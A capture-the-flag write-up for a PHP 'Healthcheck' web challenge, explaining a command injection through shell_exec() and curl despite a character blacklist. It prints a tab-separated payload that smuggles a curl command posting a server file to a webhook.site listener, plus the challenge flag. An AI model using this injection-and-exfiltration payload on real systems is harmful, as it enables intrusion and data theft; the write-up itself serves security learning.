# Healthcheck

We were given a suspiciously wholesome-looking page at:

<http://104.214.185.119/index.php>

<figure><img src="https://3060579764-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy0V3IWOg11I6nY8wI18S%2Fuploads%2FhfFRCX3J1HuqYMcuenxg%2Fimage.png?alt=media&#x26;token=d852f3b0-87f2-4242-9d5b-bc026e798eec" alt=""><figcaption></figcaption></figure>

It's titled *"Health Check Your Webpage"*, but deep down, we all knew this wasn't about HTTP wellness. Our job? Dig up something the dev left behind, their “hopes and dreams” (literally it says, *"**I left my hopes\_and\_dreams** on the server."*).

So, we open the given source code and what do we find? This:

<figure><img src="https://3060579764-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy0V3IWOg11I6nY8wI18S%2Fuploads%2F7op5OzTO0qnNp8W1mkS4%2Fimage.png?alt=media&#x26;token=b362af51-ea75-47cb-8631-9a6502994b60" alt=""><figcaption></figcaption></figure>

Something like command Injection vibes. Especially since **shell\_exec()** is used. But wait, there's a **blacklist**:

<figure><img src="https://3060579764-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy0V3IWOg11I6nY8wI18S%2Fuploads%2F4kggYyExXoutsbdFQ7cp%2Fimage.png?alt=media&#x26;token=78d77a32-cb2d-41e7-a383-9a084f39574e" alt=""><figcaption></figcaption></figure>

No <mark style="color:blue;">`;`</mark>, <mark style="color:blue;">`&`</mark>, <mark style="color:blue;">`|`</mark>, or even <mark style="color:blue;">`$`</mark>. Brutal. Like trying to eat soup with a fork.

At first, we tried every command injection trick in the book:

·       `http://127.0.0.1/hopes_and_dreams`

·       `http://104.214.185.119/index.php/hopes_and_dreams`

·        `http://example.com http://127.0.0.1/hopes_and_dreams -o /var/www/html/hopes_and_dreams`

<figure><img src="https://3060579764-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy0V3IWOg11I6nY8wI18S%2Fuploads%2FsU7FB93BSIBIFLhor4R7%2Fimage.png?alt=media&#x26;token=fd550ecb-edf8-47b8-8c05-e53143cecfaa" alt=""><figcaption></figcaption></figure>

But… nothing. It only gives back HTTP status codes like `200`, `301`. No body content. No error output. Just silence hmmm.

That’s because the output of curl was redirected to `/dev/null`:

<figure><img src="https://3060579764-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy0V3IWOg11I6nY8wI18S%2Fuploads%2FFvjET5z8Hsfr4724GzJK%2Fimage.png?alt=media&#x26;token=43eac8c2-abf9-4c4c-abc1-afe7f9b41964" alt=""><figcaption></figcaption></figure>

So, all the actual response body is thrown away.

We stopped thinking like a hacker. We started thinking like a hacker with a network. If we can't *see* the flag directly… why not *send* it to ourselves?

We used [**Webhook.site**](https://webhook.site/), a free service that gives us a unique endpoint to collect requests.

Then, we crafted this payload:

```
http://127.0.0.1/;	curl	-X	POST	-d	@hopes_and_dreams https://webhook.site/<our-unique-id>
```

We hit submit, went back to webhook.site, and there it was, sitting like a jewel in the logs:

<figure><img src="https://3060579764-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy0V3IWOg11I6nY8wI18S%2Fuploads%2F2R38NI8ZFiEtEOUt0t9V%2Fimage.png?alt=media&#x26;token=e7bc875c-9d0d-4a9b-9b0c-0a2ed4b6f102" alt=""><figcaption></figcaption></figure>

That `-o /dev/null` part discards the body. So even if `cat /flag` or `curl /flag` worked, we’d never see the output in the response.

But what if we told the vulnerable server to make its own HTTP request to somewhere we can monitor?

That’s where **webhook.site** comes in. It's our external listener. We use it as a “data exfiltration endpoint”.

By telling the target to:

**curl -X POST -d @hopes\_and\_dreams <https://webhook.site/>...**

&#x20;…it reads the contents of the hopes\_and\_dreams file and sends it as a POST request body to our webhook. No output is shown in the browser, but we don’t need it. The data is sent *to us*.&#x20;

**Flag:** <mark style="color:blue;">`umcs{n1c3_j0b_ste4l1ng_myh0p3_4nd_dr3ams}`</mark>